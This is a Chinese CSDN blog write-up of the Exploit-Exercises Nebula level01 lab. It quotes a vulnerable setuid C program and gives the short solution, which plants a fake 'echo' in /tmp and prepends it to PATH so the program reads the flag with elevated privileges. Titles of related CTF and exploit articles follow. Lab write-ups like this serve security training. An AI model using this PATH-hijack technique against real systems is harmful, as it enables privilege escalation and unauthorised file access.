i春秋 - Exploit-Exercises: Nebula - level01

最新推荐文章于 2018-04-09 14:34:51 发布
最新推荐文章于 2018-04-09 14:34:51 发布
阅读量2.5k 收藏 1
点赞数
分类专栏: exploit 文章标签: exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/scnu_jiechao/article/details/57126430
版权

About

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}

Nebula官网

思路

覆盖环境变量PATH中的echo命令

cd /tmp
vim echo
cat /home/flag01/flag
chmod 755 echo
PATH=/tmp:$PATH
/home/flag01/flag01

flag

jchalex
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
04-25
Exploit-Exercises Nebula全攻略——Linux平台下的漏洞分析入门
ExploitExercises_Nebula_Level01
小黑话不多
12-26 1375
题目源码如下: #include #include #include #include #include int main(int argc, char **argv, char **envp) { gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid);
Nebula level01
无心插柳
11-08 6859
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01 . Files for t
i春秋 - Exploit-Exercises: Nebula - level02
无节操
02-25 1136
AboutThere is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?Source code#include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/ty
Nebula_level01
yuansunxue的专栏
01-28 357
http://www.kroosec.com/2012/10/nebula-level01.html In level01 of Nebula wargame, we are required to find a vulnerability that allows us to run arbitrary programs. The source code of flag01 is p
linux-exploit-suggester:Linux特权升级审核工具
04-22
LES:Linux特权升级审核工具快速下载: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh有关LES用法和内部工作方式的详细信息: ...
CMS-Exploit-Framework:CMS 漏洞利用框架
07-10
chu@sh3ll-me:/tmp » git clone https://github.com/chuhades/CMS-Exploit-Framework.gitCloning into 'CMS-Exploit-Framework'...remote: Counting objects: 352, done.remote: Compressing objects: 100% (182/...
jndi-JNDI-Injection-Exploit
12-27
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。 (可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator....
google-translate-exploit:Google翻译翻译漏洞
02-03
google-translate-exploit:Google翻译翻译漏洞
awesome-vm-exploit:分享有关vm和qemuscape漏洞利用的一些有用档案
02-02
awesome-vm-exploit:分享有关vm和qemuscape漏洞利用的一些有用档案
i春秋 - Exploit-Exercises: Nebula - level00
无节操
02-25 2387
AboutThis level requires you to find a Set User ID program that will run as the “flag00” account. You could also find this by carefully looking in top level directories in / for suspicious looking dire
i春秋 - Exploit-Exercises: Nebula - level03
无节操
02-25 1896
AboutCheck the home directory of flag03 and take note of the files there.There is a crontab that is called every couple of minutes.思路先进flag文件夹看看cd /home/flag03 vim writable.sh#!/bin/shfor i in /home/fl
ExploitExercises_Nebula_Level07
小黑话不多
12-28 1047
题目源码为一段perl脚本: #!/usr/bin/perl use CGI qw{param}; print "Content-type: text/html\n\n"; sub ping { $host = $_[0]; print("Ping results"); @output = `ping -c 3 $host 2>&1`; foreach $line (@
Exploit-exercises
MillionSky的专栏
04-09 2056
1 概述Exploit-Exercise是一个Linux平台下漏洞挖掘、分析的练习平台。网址为:https://exploit-exercises.com官方提供了个很多虚拟机、文档、挑战题目,用于学习各种计算机安全问题,如权限提升、漏洞分析、Exploit开发、调试、逆向工程和通用的网络安全问题。 目前有几个板块:Nebula、Protostar、Fusion、Main Sequence、Clo...
pwnable.kr - fd
无节操
12-19 3609
题目: 题目链接:http://pwnable.kr/play.php ——> 连接登录:ssh [email protected] -p2222查看文件及权限:ls -al看到flag文件,但是当前用户fd并没有读权限。 查看fd.ccat fd.c目标:执行system(“/bin/cat flag”); 则:strcmp(“LETMEWIN\n”, buf) == 0 则:buf =
Defcon - 2015 - 初赛 - r0pbaby writeup
无节操
11-05 3574
资源r0pbaby 程序目的getshell思路查看文件类型$ file r0pbaby r0pbaby: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, stripped
pwnable.kr collision
无节操
12-25 2806
题目: 题目链接:http://pwnable.kr/play.php ——>连接登录查看源码如下:#include <stdio.h> #include <string.h> unsigned long hashcode = 0x21DD09EC; unsigned long check_password(const char* p){ int* ip = (int*)p;
Protostar Stack Write Up
无节操
11-08 1474
Protostar Stack0 #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you
linux-exploit-suggester2
最新发布
07-28
针对 Linux 系统的漏洞利用建议工具有很多,其中一个常用的工具是 Linux-exploit-suggester 2。它是一个能够检测 Linux 系统中已知漏洞的脚本,以帮助系统管理员评估系统安全性并提供潜在的漏洞利用建议。 该工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值